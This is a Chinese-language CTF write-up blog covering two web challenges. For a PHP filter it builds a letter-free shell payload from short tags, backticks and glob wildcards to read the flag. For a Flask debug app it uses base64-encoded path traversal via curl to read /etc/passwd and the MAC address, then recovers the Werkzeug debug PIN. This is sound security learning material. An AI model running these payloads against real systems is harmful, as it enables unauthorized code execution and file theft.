前言
一边无奈学习开发,一边不想放下自己的喜爱的信息安全方向。但我也怕顾此失彼啊,无奈。这里顺手记录下题解吧,不定时append
babybypass
出自:linkedbyX-11.11特别赛① PS:这个题目其实就是安恒9月web题原题。
1 |
|
从GET中取code键值两个要求
- 长度不能超过35
- 符合
[A-Za-z0-9_$]+
正则表达式,不能出现字母数字和_$
Orz,感觉思考不出来,只记得ph牛博客中好像有一遍可以不用字母就能构造shell的。于是找了一波资料原来是这种操作。
因为正则把$给限制了加之长度限制,所以这里不能用构造变量的方法,于是采用Linux下的glob通配符
*
可以代替0个及以上任意字符?
可以代表1个任意字符
1 | GET /?code=?><?=`/???/???%20/???/???/????/*`?> HTTP/1.1 |
用?>
先闭合前面,再<??>
使用反引号来执行shell命令
读到了index.php源码,flag文件就在/flag下面,那就直接读它
1 | GET /?code=?><?=`/???/???%20/????`;?> HTTP/1.1 |
这道题涉及到的知识点太多了,各位大佬的博客也是脑洞打开,各种奇淫巧技都有。后面再专做文章研究吧,在此不展开
reference
ph牛
安全客:CTF题目思考–极限利用
一叶飘零师傅:2018安恒杯-9月月赛Writeup
- Angel_Kitty:记一次拿webshell踩过的坑(如何用PHP编写一个不包含数字和字母的后门
粗心的程序员呀
出自:LinkedbyX-11.11特别赛③ PS:这个好像是8月月赛原题
打开地址,发现注册会报错,从错误信息中发现是Flask且开了debug,在页面中需要pin码就能打开console。还发现了页面image的src路径有蹊跷。测试是base64编码。于是存在任意文件读取漏洞。
flask并不太熟悉,Python web我还没好好学flask,于是看了一波资料。又是大佬们的长篇精彩分析,这题的题解如下
根据文章对pin码的生成分析,要获取6个变量值
1 | username # 用户名 |
放到这题中来分别读取的payload为
username为ctf,读取
../../..//etc/passwd
这里从页面中知道了脚本路径,这里引用相对路径。还有即使不知道,无线向上..也是可以的,payload url为curl http://101.71.29.5:10057/image/Ly4uLy4uLy4uL2V0Yy9wYXNzd2Q=
modename模块名为flask.app
uuid.getnode这个是mac地址十进制,为2485377892354。我们先用读/sys/class/net/eth0/address,在转下十进制就好了,payload url为
curl http://101.71.29.5:10057/image/Ly4uLy4uLy4uL3N5cy9jbGFzcy9uZXQvZXRoMC9hZGRyZXNz
get_machine_id这个这里是空,
/etc/machine-id
和/proc/sys/kernel/random/boot_id
都空白内容。不知额app的
__name__
为Flaskmod的
__file__
这里试了网页上爆出的路径为/usr/local/lib/python2.7/dist-packages/flask/app.py
但是这样生成的pin就是不对额,后来看表哥们的wp,这里要用pyc。PS:pyc是Python的编译后的字节码文件,如果py文件没有修改的话,都是执行pyc文件的,如果py源文件修改了pyc文件会重新编译。而且还有一个很重要的点,如果py源文件不存在,会执行pyc文件的!!原pyc文件。
1 | import hashlib |
最终的pin为131-442-946
然后在网页中读取下文件flag内容
reference
Mark
- Flask安全周边学习
- Flask开发学习
后续更新~